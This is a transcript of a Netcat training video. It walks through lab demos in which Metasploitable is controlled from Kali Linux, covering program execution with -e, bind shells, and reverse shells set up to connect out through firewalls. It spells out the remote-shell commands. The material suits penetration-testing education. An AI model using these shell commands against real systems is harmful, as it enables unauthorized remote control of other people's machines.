Hello everyone, welcome to this video tutorial brought to you by Security Academy. Today we're gonna continue our series on Netcat. If you haven't watched part 1 of this series, please go ahead and watch it before watching this part, because this part is an advanced part and it is built upon a basic understanding of Netcat. The topic we're gonna cover exactly on Netcat is how we can tunnel a shell between two systems, particularly in one of two mechanisms, and these are the bind shell and reverse shell. We're gonna look into the pros and cons of each one of them and the network architecture that actually supports each one of those. But before talking about shell, we need to understand one of the most important features of Netcat, which is its ability to execute a program, or its ability to be triggered upon establishing a connection to execute a program. Netcat has a powerful feature. It can be triggered to execute a program. You can instruct Netcat to execute a certain executable file that can either be exe file, elf file, or simply a script like shell, Ruby, Python, whether this file is built in the system or your own file that you have written and developed. And you can enable this feature when you run Netcat as a client or as a server. It works both ways. Now, if you enable it with Netcat as a client, what's gonna happen is the following. As soon as it establishes a connection with the server, it is going to execute your file. If you enable this feature on Netcat as a server, then as soon as Netcat receives a connection from a client, it is going to execute this file. Another thing we have to pay attention to here is the input and output of this file, of this executable file, is going to be redirected to the established socket. So this program no longer takes input from the screen and from the terminal and no longer types the output on the terminal. Rather, it is going to be streamed to the established TCP session. And the way to enable this feature is to use the -E switch. So whenever you use -E and then you give it a path to your file, an executable file, then Netcat is going to execute this file as soon as a connection is established. And we can see in this diagram here how your executable file, while it's running by itself independently of Netcat, it has its standard input and the standard output to the screen and to the keyboard. So it reads input from the keyboard and then it prints output to the screen on the terminal window. However, when you run this process using Netcat triggering mechanism, what is going to happen is these input and output pipes are going to be redirected to the established socket. So the process is going to read input from the established connection and is going to print its output again to the established connection, reaching the remote system. Let's see a demo of how this actually works before talking about shell. In here I have two systems, Metasploitable to the right side and Kali Linux to the left side. And for the sake of the entire tutorial today, we're gonna assume that Metasploitable is our target system, is the system that we want to control and we want to actually penetrate and have shell on, and Kali Linux is going to be our controlling machine. What I'm gonna do now here is I'm going to set up a listener on using Netcat. So Netcat -L -P, and then I will listen on port 6666, and as soon as I receive a connection, I'm gonna execute ls command. So bin ls is the location of the ls program. So I will have this Netcat running as a server, and then from Kali Linux I'm gonna run Netcat and connect to Metasploitable machine 192.168.0.100, which is the IP address of Metasploitable on port 6666. Now Netcat on Kali Linux is going to initiate a connection to Metasploitable on port 6666, and Netcat in here is going to listen and accept this connection, and as soon as it accepts the connection, it's going to run the ls command. Now obviously, as I said, is the output of ls should not be printed at Metasploitable terminal. It should be sent over the TCP socket to the Kali Linux. So let's see how it goes. So I connect here, and then yes, I got the output of the ls command printed on my Kali Linux machine. So Netcat test and vulnerable, and to verify, if I type ls now independently here, I have these two files listed. Let us now build our own script, shell script, to take input from the user and type output, and execute this script using Netcat. And I'm gonna create a file here called myping, and I'm gonna explain to you in a while what this file will do actually. So let's just type here our shell, and this file is going to read an IP address from the user, and then it's going to ping this IP address 4 times, and then it's going to loop again and read another IP address. So there will be here an infinite loop. So while 1 equal 1, which means it's an infinite loop, do read IP address, and then I'm going to ping this IP address 4 times, IP address, done. Yes, exit. So if I check my script, it should be perfect script. All I need now to do is to actually change the permission of this file to make it executable. And now if I execute it from my machine directly from Metasploitable, what I should be getting is a prompt to enter an IP address. So if I do this and then I type enter, it pings now 8.8.8.8. Now it's waiting for me to enter another IP address, so I can type www.google.com, and then it should ping google.com with 4 packets, and then I can type, for example, www.microsoft.com. It should also ping this IP address. Let us now attach this program to Netcat and execute it using Netcat when it receives a connection. So Netcat -L -P again. This time let's make it 7777, and then execute my ping. Now we should have the input and the output of this script redirected to our Kali Linux, redirected to the TCP stream. So if I connect to the remote Netcat now from Kali Linux, the connection is now established, and I am prompted to enter something here. So if I enter www.google.com, then I can see that the ping is working fine. So I can enter another IP here, and then it's pinging perfectly fine. Now, of course, all the pings are being done not from the Kali machine here, but from Metasploitable. It is Metasploitable that is doing the pinging, but the input that my ping script is reading, it is reading it from the TCP stream that is attached to a Netcat client on Kali Linux, and whatever output that this script is now printing, it's not printing it on this screen on Metasploitable terminal. Rather, it is sending it over the TCP socket stream to Kali Linux, and then it's being printed out here by the Netcat client. So I can do Microsoft.com now and see the ping is working successfully. So having understood now how we can trigger a program, how we can trigger Netcat to execute a program, we can now start working with shell. Now, there is one particular program, you can say, that if I execute, I will have a complete shell access, and that is the actual shell interpreter. And the shell interpreter in Linux itself is actually an executable file in the binary directory, in the bin directory. So if I trigger Netcat to execute the bin bash or one of other shells, because there is bin and sh, there is the C shell, there are different shells available, but bash is the most powerful and the most popular shell available. So if I execute this file, the bin bash, which is itself an interpreter for shell command, then I will have access to all the shell commands available within the bash subsystem. So instead of now executing a certain script or executing like a command like ls or cat or echo, I simply will trigger Netcat to execute bin bash, and I will have access to all the commands that are available. And the way this interactive shell look like is actually similar to how you would telnet to a machine or SSH to a machine. So we'll have interactive shell in the same way you would have when you access a machine using SSH. Now, if you ask Netcat to execute this program on Netcat as a server, then you will have a bind shell. But if you instruct Netcat as a client to run the bin bash, you will have a reverse shell. So we have now two machines. The target machine is over here to your right, and then you are the penetration tester or the system administrator on your own machine to the left. We want to execute bin bash on the target machine, because if you execute bin bash on your machine, then you will give other people access to your shell, which is not what you want. We want to execute the bin bash on the target machine. So whether we are working with bind shell or reverse shell, always we're gonna trigger the bin bash execution on the target machine, never on your own machine, unless you know what you are doing and you won't intentionally give other access to your system. Otherwise, you should not run or execute bin bash on your machine from your Netcat. So in the bind shell is going to be like this. We are going to listen on a certain port on the target machine. So we're gonna listen on port 4567, and this process is called the binding process. Opening a port on any server is called a binding process. So we bind Netcat to listen on port 4567, and along with this binding, we are instructing Netcat to execute the bin bash once a connection is established, so that whenever somebody connects to this port, the bin bash is going to be linked and associated to the TCP stream. So we come now from our computer, from our system, and then issue the following command. We're going to run Netcat in the client mode, and of course we need to specify the IP address of the target, and then the port number 4567, we will type it here, and upon hitting enter, what is going to happen now is our machine is going to establish a connection with the target machine. The way the connection is going to be established is simply using the TCP three-way handshake. So our machine will send a SYN packet, and then the target is going to reply with SYN ACK packet, and then our machine is going to finish the handshake with an ACK. After the connection has been established, we can now start sending normal shell commands to the server, and then bin bash will execute these, will interpret this command, and whatever output these commands will have will be returned through the TCP stream to our machine, and then we will see them on our terminal. Let us look at a demo now. So we have again our Metasploitable, which is going to be our target on the right hand, and then Kali Linux, which is going to be our controlling machine on the left hand. So as we said, we're gonna start by setting up the listener on the target machine. So netcat -L, a listening mode on port 4567, but this time execute the bin bash shell interpreter. So we hit enter, and supposedly the server is now waiting for incoming connection. And all we need to do now is to run netcat in the client mode and connect to the Metasploitable machine on 192.168.0.100, which is the IP address of Metasploitable, and then specify the port 4567. And as soon as we hit enter and the connection is established, now we have established a three-way handshake with Metasploitable, and then I can type ls, and then I see the output. So I see the files. If I type, for example, uname -a to check the signature of the remote server, I can see exactly here it's Linux Metasploitable 2.6.24. If I type print working directory, I am at home MSF admin, and then I can go, for example, to the root directory and do another ls to check the files available. I can do netstat and see the connections. For example, I can do ps and check the port, and check all the processes that are running, and so on. So I can have total shell as if now I am having SSH access or telnet access, and I can execute whatever command. I can even create files, touch hacked file, and then I have, okay, permission denied because I am at the root directory, but I am not a root, so I am MSF admin. So if I go to home and then MSF admin, okay, ls, in here I can create file hacked file, and then echo you are hacked, for example, and then redirect it to hacked file, cat hacked file. I can see exactly. Now if I close this connection and here I type ls, I can see the hacked file is now available. And then if I do cat hacked file, I can see the statement that I have written before. Now this is a bind shell. The problem or the disadvantage of bind shell is that it doesn't work if the target is protected by a firewall. Whatever port we're gonna listen on is going to be inaccessible from our machine because the firewall is blocking everything. So what can be the solution to this? The solution is simply the following. Most firewalls by default are configured with the following configuration. They deny access from insecure network to the secure network, but they allow access from the secure network to insecure network. And what this means is a firewall would block by default all incoming connection from the outward world to the target machine here. However, a firewall by default would allow the target machine to initiate connection and go outside to the outside world now on any port it wants, unless explicitly denied. So we can take advantage now of this fact and instruct our target to initiate the connection instead of us initiating the connection. And this is the idea of reverse shell now. So in reverse shell, instead of binding a port on the target machine, we are going to bind a listener port on our machine. So our machine now is going to listen on the port 4567. Yet it is not our machine that's going to execute the bin bash, because we said the bin bash is always gonna be executed on the target machine alone. After binding our machine to port 4567, what we need to do now is instruct the target machine to connect to this port, to our machine on our port, and then Netcat as a client that is running on the target is going to execute the bin bash upon a successful connection. So we're gonna have now the target machine execute the following command: netcat -e bin bash to execute bin bash, and then connect to the controlling machine, which is our machine here, on port 4567. And what's gonna happen is the following: the target machine is gonna send a send packet now through the firewall all the way to our machine, and then we're gonna respond with send ACK, and then the target is gonna finish the handshake with an ACK packet. After the connection is established, we can start now sending commands from our machine to the target machine and then receive the responses back to our machine. You can see now why this is called reverse shell. In bind shell, we are the client connecting to the target, that is the server, and then we are controlling the target. But in this architecture now, in the reverse shell architecture, we are the server and the target is the client that connects to our machine, and then we control the client or the target by sending commands to it and then receiving responses from it. Let us see a demo. Again, we have to the right side the Metasploitable OS, and to the left side we have Kali Linux. Instead of starting the Netcat listener or Metasploitable, we're gonna run Netcat listener on Kali Linux on our machine. So I'm gonna go ahead now and listen on port 4567, and this is all I need to do, and hit enter now. And then on Metasploitable, I'm gonna run Netcat as a client, connecting to the Kali Linux machine, which has the IP 192.168.0.102, and then the port 4567. However, in here I need to attach the file bin bash, and then I hit enter. You can either type the -e bin bash before the IP address or after the port number. It doesn't matter the order. So supposedly now the connection is established, Metasploitable connected to Kali Linux on this port, and since this shell is being executed on Metasploitable, we must have access to this shell now. So if I type now uname -a here, I get the banner of Metasploitable. Again, Metasploitable 2.6.24. I can type ls. Again, I can see all this file along with the previous one, hacked files, and then print work directory. I'm here. I'm going to remove now the hacked file. So remove the hacked file, and then ls again, and I can close the connection and go here and verify that the file has been deleted. So that was a demo of a reverse shell, and I want you to remember one important thing, that reverse shell works very well if your target system behind a firewall. In fact, reverse shell is always preferred over bind shell in practical situations, especially if you are doing a penetration testing and you want to be stealthy and you want to have access to networks behind a firewall. Then reverse shell has more advantage than the bind shell. That's all we wanted to cover in this tutorial. Thank you very much for watching and listening, and I hope it was very beneficial for you. If you like this video, please leave a thumbs up and subscribe to the channel for later videos, and see you again.